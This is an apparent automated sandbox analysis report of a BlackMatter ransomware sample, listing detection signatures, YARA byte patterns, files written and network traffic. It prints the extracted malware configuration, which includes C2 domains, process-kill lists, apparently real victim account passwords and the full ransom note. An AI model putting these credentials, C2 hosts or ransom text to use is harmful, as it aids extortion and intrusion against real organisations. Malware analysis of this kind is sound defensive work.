Loading ...

Play interactive tourEdit tour

Windows Analysis Report GlLHM7paoZ.exe

Overview

General Information

Sample Name:GlLHM7paoZ.exe
Analysis ID:508200
MD5:598c53bfef81e489375f09792e487f1a
SHA1:80a29bd2c349a8588edf42653ed739054f9a10f5
SHA256:22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6
Infos:

Most interesting Screenshot:

Detection

BLACKMatter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Found ransom note / readme
Antivirus / Scanner detection for submitted sample
Yara detected BLACKMatter Ransomware
Multi AV Scanner detection for domain / URL
Hides threads from debuggers
Changes the wallpaper picture
Found Tor onion address
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Writes a notice file (html or txt) to demand a ransom
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Uses code obfuscation techniques (call, push, ret)
Contains functionality to execute programs as a different user
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Contains functionality to read the PEB
Enables security privileges

Classification

Process Tree

  • System is w10x64
  • GlLHM7paoZ.exe (PID: 4540 cmdline: 'C:\Users\user\Desktop\GlLHM7paoZ.exe' MD5: 598C53BFEF81E489375F09792E487F1A)
  • cleanup

Malware Configuration

Threatname: BLACKMatter

{"Version": "1.2", "RSA Key": "8719a830f4ba94949291582b6654f96c96d9a0f4419f52f367cf2e19b9c95a9b7091cbefafbe5ae39dae285894590a8db8b764e572fab5234646f8659ada2fbd8c37bfddd60797a5ad9dad2ded37969d179ea4ad4c1980d0e70b056241d325e18beb5cc4925fa56abf810f916e7932d016a86e3ad97749e75f9031114b060b56", "Company Victim ID": "512478c08dada2af19e49808fbda5b0b", "AES key": "a6f330b09cd47b4fb9214f7836aa46ad", "ODD_CRYPT_LARGE_FILES": false, "NEED_MAKE_LOGON": true, "MOUNT_UNITS_AND_CRYPT": true, "CRYPT_NETWORK_RESOURCES_AND_AD": true, "TERMINATE_PROCESSES": true, "STOP_SERVICES_AND_DELETE": true, "CREATE_MUTEX": true, "PREPARE_VICTIM_DATA_AND_SEND": true, "PROCESS_TO_KILL": ["encsvc", "thebat", "mydesktopqos", "xfssvccon", "firefox", "infopath", "winword", "steam", "synctime", "notepad", "ocomm", "onenote", "mspub", "thunderbird", "agntsvc", "sql", "excel", "powerpnt", "outlook", "wordpad", "dbeng50", "isqlplussvc", "sqbcoreservice", "oracle", "ocautoupds", "dbsnmp", "msaccess", "tbirdconfig", "ocssd", "mydesktopservice", "visio"], "SERVICES_TO_KILL": ["mepocs", "memtas", "veeam", "svc$", "backup", "sql", "vss"], "C2_URLS": ["https://paymenthacks.com", "http://paymenthacks.com", "https://mojobiden.com", "http://mojobiden.com"], "LOGON_USERS_INFORMATION": ["aheisler@hhcp.com:120Heisler", "dsmith@hhcp.com:Tesla2019", "administrator@hhcp.com:iteam8**"], "RANSOM_NOTE": "      ~+                                       \r\n               *       +\r\n         '     BLACK        |\r\n     ()    .-.,='``'=.    - o -         \r\n           '=/_       \\     |           \r\n        *   |  '=._    |                \r\n             \\     `=./`,        '    \r\n          .   '=.__.=' `='      *\r\n +             Matter        +\r\n      O      *        '       .\r\n\r\n>>> What happens?\r\n   Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver.\r\n   We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.\r\n\r\n>>> What guarantees? \r\n   We are not a politically motivated group and we do not need anything other than your money. \r\n   If you pay, we will provide you the programs for decryption and we will delete your data. \r\n   If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. \r\n   We always keep our promises.\r\n\r\n>> Data leak includes\r\n1. Full emloyeers personal data\r\n2. Network information\r\n3. Schemes of buildings, active project information, architect details and contracts, \r\n4. Finance info\r\n\r\n\r\n>>> How to contact with us? \r\n   1. Download and install TOR Browser (https://www.torproject.org/).\r\n   2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.\r\n  \r\n>>> Warning! Recovery recommendations.  \r\n   We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them."}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
GlLHM7paoZ.exeRAN_BlackMatter_Aug_2021_1Detect BlackMatter ransomwareArkbird_SOLG
  • 0xb83b:$s1: 55 8B EC 81 EC AC 02 00 00 53 51 52 56 57 C7 45 FC 00 00 00 00 C7 45 F4 00 00 00 00 C7 45 F0 00 00 00 00 C7 45 EC 00 00 00 00 6A 00 FF 15 00 15 41 00 85 C0 0F 85 3E 04 00 00 8D 45 D4 50 6A 00 ...
  • 0xbabf:$s2: 8D 45 88 C7 00 A1 5F 42 22 C7 40 04 AC 5F 56 22 C7 40 08 D7 5F 29 22 C7 40 0C C2 5F 45 22 C7 40 10 A3 5F 3B 22 C7 40 14 AE 5F 69 22 C7 40 18 80 5F 76 22 C7 40 1C 98 5F 72 22 C7 40 20 88 5F 74 ...
  • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
  • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
  • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
  • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
  • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmpJoeSecurity_blackmatterYara detected BLACKMatter RansomwareJoe Security
    00000000.00000003.279421242.00000000012FC000.00000004.00000001.sdmpJoeSecurity_blackmatterYara detected BLACKMatter RansomwareJoe Security
      00000000.00000002.359933097.00000000012FF000.00000004.00000001.sdmpJoeSecurity_blackmatterYara detected BLACKMatter RansomwareJoe Security
        Process Memory Space: GlLHM7paoZ.exe PID: 4540JoeSecurity_blackmatterYara detected BLACKMatter RansomwareJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.GlLHM7paoZ.exe.10f0000.0.unpackRAN_BlackMatter_Aug_2021_1Detect BlackMatter ransomwareArkbird_SOLG
          • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
          • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
          • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
          • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
          • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...
          0.0.GlLHM7paoZ.exe.10f0000.0.unpackRAN_BlackMatter_Aug_2021_1Detect BlackMatter ransomwareArkbird_SOLG
          • 0x61b3:$s3: 8D 45 B4 C7 00 21 0A 83 E9 C7 40 04 C5 CE D7 33 C7 40 08 40 C4 06 E2 C7 40 0C A2 87 FB DD B9 04 00 00 00 81 30 ED 5F 06 22 83 C0 04 49 75 F4 8D 45 A4 C7 00 6A F9 14 FE C7 40 04 92 2C C9 33 C7 ...
          • 0x6dc:$s4: 8D BD FC FE FF FF 32 C0 AA B9 2A 00 00 00 B0 FF F3 AA B0 3E AA B9 03 00 00 00 B0 FF F3 AA B0 3F AA B9 0A 00 00 00 B0 34 AA FE C0 E2 FB B9 03 00 00 00 B0 FF F3 AA 32 C0 AA B9 03 00 00 00 B0 FF ...
          • 0x108e5:$s5: 35 35 35 4F 35 58 35 22 36 35 36 3F 36 2C 37 3F 37 60 37 76 37
          • 0x10865:$s6: 3D 2B 3D 47 3D 4D 3D 60 3D 67 3D 6D 3D
          • 0x791:$s7: 8B 0E 0F B6 D1 0F B6 DD 57 8D BD FC FE FF FF 8A 04 3A 8A 24 3B C1 E9 10 83 C6 04 0F B6 D1 0F B6 CD 8A 1C 3A 8A 3C 39 5F 8A D4 8A F3 C0 E0 02 C0 EB 02 C0 E6 06 C0 E4 04 C0 EA 04 0A FE 0A C2 0A ...

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpackMalware Configuration Extractor: BLACKMatter {"Version": "1.2", "RSA Key": "8719a830f4ba94949291582b6654f96c96d9a0f4419f52f367cf2e19b9c95a9b7091cbefafbe5ae39dae285894590a8db8b764e572fab5234646f8659ada2fbd8c37bfddd60797a5ad9dad2ded37969d179ea4ad4c1980d0e70b056241d325e18beb5cc4925fa56abf810f916e7932d016a86e3ad97749e75f9031114b060b56", "Company Victim ID": "512478c08dada2af19e49808fbda5b0b", "AES key": "a6f330b09cd47b4fb9214f7836aa46ad", "ODD_CRYPT_LARGE_FILES": false, "NEED_MAKE_LOGON": true, "MOUNT_UNITS_AND_CRYPT": true, "CRYPT_NETWORK_RESOURCES_AND_AD": true, "TERMINATE_PROCESSES": true, "STOP_SERVICES_AND_DELETE": true, "CREATE_MUTEX": true, "PREPARE_VICTIM_DATA_AND_SEND": true, "PROCESS_TO_KILL": ["encsvc", "thebat", "mydesktopqos", "xfssvccon", "firefox", "infopath", "winword", "steam", "synctime", "notepad", "ocomm", "onenote", "mspub", "thunderbird", "agntsvc", "sql", "excel", "powerpnt", "outlook", "wordpad", "dbeng50", "isqlplussvc", "sqbcoreservice", "oracle", "ocautoupds", "dbsnmp", "msaccess", "tbirdconfig", "ocssd", "mydesktopservice", "visio"], "SERVICES_TO_KILL": ["mepocs", "memtas", "veeam", "svc$", "backup", "sql", "vss"], "C2_URLS": ["https://paymenthacks.com", "http://paymenthacks.com", "https://mojobiden.com", "http://mojobiden.com"], "LOGON_USERS_INFORMATION": ["aheisler@hhcp.com:120Heisler", "dsmith@hhcp.com:Tesla2019", "administrator@hhcp.com:iteam8**"], "RANSOM_NOTE": " ~+ \r\n * +\r\n ' BLACK |\r\n () .-.,='``'=. - o - \r\n '=/_ \\ | \r\n * | '=._ | \r\n \\ `=./`, ' \r\n . '=.__.=' `=' *\r\n + Matter +\r\n O * ' .\r\n\r\n>>> What happens?\r\n Your network is encrypted, and currently not operational. We have downloaded 1TB from your fileserver.\r\n We need only money, after payment we will give you a decryptor for the entire network and you will restore all the data.\r\n\r\n>>> What guarantees? \r\n We are not a politically motivated group and we do not need anything other than your money. \r\n If you pay, we will provide you the programs for decryption and we will delete your data. \r\n If we do not give you decrypters or we do not delete your data, no one will pay us in the future, this does not comply with our goals. \r\n We always keep our promises.\r\n\r\n>> Data leak includes\r\n1. Full emloyeers personal data\r\n2. Network information\r\n3. Schemes of buildings, active project information, architect details and contracts, \r\n4. Finance info\r\n\r\n\r\n>>> How to contact with us? \r\n 1. Download and install TOR Browser (https://www.torproject.org/).\r\n 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.\r\n \r\n>>> Warning! Recovery recommendations. \r\n We strongly recommend you to do not MODIFY or REPAIR your files, that will damage them."}
          Multi AV Scanner detection for submitted fileShow sources
          Source: GlLHM7paoZ.exeVirustotal: Detection: 86%Perma Link
          Source: GlLHM7paoZ.exeMetadefender: Detection: 77%Perma Link
          Source: GlLHM7paoZ.exeReversingLabs: Detection: 92%
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: GlLHM7paoZ.exeAvira: detected
          Multi AV Scanner detection for domain / URLShow sources
          Source: paymenthacks.comVirustotal: Detection: 15%Perma Link
          Source: mojobiden.comVirustotal: Detection: 14%Perma Link
          Source: ww25.paymenthacks.comVirustotal: Detection: 7%Perma Link
          Machine Learning detection for sampleShow sources
          Source: GlLHM7paoZ.exeJoe Sandbox ML: detected
          Source: 0.2.GlLHM7paoZ.exe.10f0000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
          Source: 0.0.GlLHM7paoZ.exe.10f0000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
          Source: GlLHM7paoZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Videos\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Searches\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Saved Games\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Recent\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Pictures\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Pictures\Camera Roll\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\OneDrive\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Music\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Links\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Favorites\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Favorites\Links\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Downloads\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\ZQIXMVQGAH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\QNCYCDFIJJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\QCFWYSKMHA\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\PIVFAGEAAV\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\NWCXBPIUYI\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\LFOPODGVOH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\JDDHMPCDUJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\GIGIYTFFYT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\GAOBCVIQIJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\DUUDTUBZFW\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\BNAGMGSPLO\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Documents\BJZFPPWAPT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\QNCYCDFIJJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\QCFWYSKMHA\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\PIVFAGEAAV\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\NWCXBPIUYI\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\LSBIHQFDVT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\LFOPODGVOH\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\JDDHMPCDUJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\GIGIYTFFYT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\GAOBCVIQIJ\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\DUUDTUBZFW\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\BNAGMGSPLO\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Desktop\BJZFPPWAPT\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\Contacts\kVuoJyeoW.README.txtJump to behavior
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeFile created: C:\Users\user\3D Objects\kVuoJyeoW.README.txtJump to behavior
          Source: unknownHTTPS traffic detected: 103.224.212.222:443 -> 192.168.2.3:49755 version: TLS 1.2
          Source: GlLHM7paoZ.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F5928 FindFirstFileW,LoadLibraryW,FindNextFileW,FindClose,0_2_010F5928
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010FBF33 GetFileAttributesW,SetThreadPriority,FindFirstFileExW,FindNextFileW,FindClose,0_2_010FBF33
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6BBF FindFirstFileExW,GetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,0_2_010F6BBF
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6A11 FindFirstFileExW,FindNextFileW,0_2_010F6A11
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F6AE4 FindFirstFileExW,FindClose,0_2_010F6AE4
          Source: C:\Users\user\Desktop\GlLHM7paoZ.exeCode function: 0_2_010F8BB4 GetLogicalDriveStringsW,0_2_010F8BB4

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2033635 ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com) 192.168.2.3:51143 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2033635 ET TROJAN BlackMatter CnC Domain in DNS Lookup (paymenthacks .com) 192.168.2.3:56009 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:59026 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:49572 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:52130 -> 8.8.8.8:53
          Source: TrafficSnort IDS: 2033636 ET TROJAN BlackMatter CnC Domain in DNS Lookup (mojobiden .com) 192.168.2.3:55102 -> 8.8.8.8:53
          Found Tor onion addressShow sources
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
          Source: kVuoJyeoW.README.txt7.0.drString found in binary or memory: 2. Open http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
          Source: Joe Sandbox ViewASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 199.59.242.153 199.59.242.153
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: http://mojobiden.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIzLa=
          Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342688022.0000000001354000.00000004.00000001.sdmpString found in binary or memory: http://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3f
          Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmpString found in binary or memory: http://paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPvT&NIz
          Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: http://paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&m
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.drString found in binary or memory: http://supp24yy6a66hwszu2piygicgwzdtbwftb76htfj7vnip3getgqnzxid.onion/7NT6LXKC1XQHW5039BLOV.
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: http://ww25.paymenthacks.com/
          Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmpString found in binary or memory: http://ww25.paymenthacks.com/?wFdsAo=m8SxzzJYA8Cye0ZuIp&IIu7qt4s=9vaqCkIU&P0rY85r3g=3yWBtmW9ThsVHLPv
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359922754.00000000012F6000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmp, GlLHM7paoZ.exe, 00000000.00000003.279363599.00000000012F3000.00000004.00000001.sdmp, GlLHM7paoZ.exe, 00000000.00000003.342654946.00000000012FE000.00000004.00000001.sdmpString found in binary or memory: http://ww25.paymenthacks.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: http://ww25.paymenthacks.com/u
          Source: GlLHM7paoZ.exe, 00000000.00000003.356795940.0000000001354000.00000004.00000001.sdmpString found in binary or memory: https://mojobiden.com/
          Source: GlLHM7paoZ.exe, 00000000.00000003.356398285.00000000012FB000.00000004.00000001.sdmpString found in binary or memory: https://mojobiden.com/?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3
          Source: GlLHM7paoZ.exe, 00000000.00000002.359911192.00000000012DE000.00000004.00000020.sdmpString found in binary or memory: https://mojobiden.com/ments
          Source: GlLHM7paoZ.exe, 00000000.00000003.279368947.00000000012FB000.00000004.00000001.sdmp, kVuoJyeoW.README.txt7.0.drString found in binary or memory: https://www.torproject.org/).
          Source: unknownHTTP traffic detected: POST /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brContent-Type: text/plainUser-Agent: Chrome/91.0.4472.77Host: paymenthacks.comContent-Length: 816Cache-Control: no-cache
          Source: unknownDNS traffic detected: queries for: paymenthacks.com
          Source: global trafficHTTP traffic detected: GET /?ztYdx0Q=9Jh2L4nBPBJechaF7&aLz8nwiFC=fVBFCEdqrnS06Ab&ZaNSaGgG3=maO6bGG6LAg&mi3fju3=SkxeAp3EGyy3E&fGep=oo79la8IfpgF2Pf&Ktpuhpgn=2pQNXS3RarpD2S&lzLC=HEaimaSUBS3zw0nFsZL&MNg=HhbZ8eK&subid1=20211024-1821-244d-afd2-7f2406ac953a HTTP/1.1Accept: */*Connection: keep-aliveAccept-Encoding: gzip, deflate, brUser-Agent: Chrome/91.0.4472.77Cache-Control: no-cacheHost: ww25.paymenthacks.comCookie: __tad=1635060084.7055840
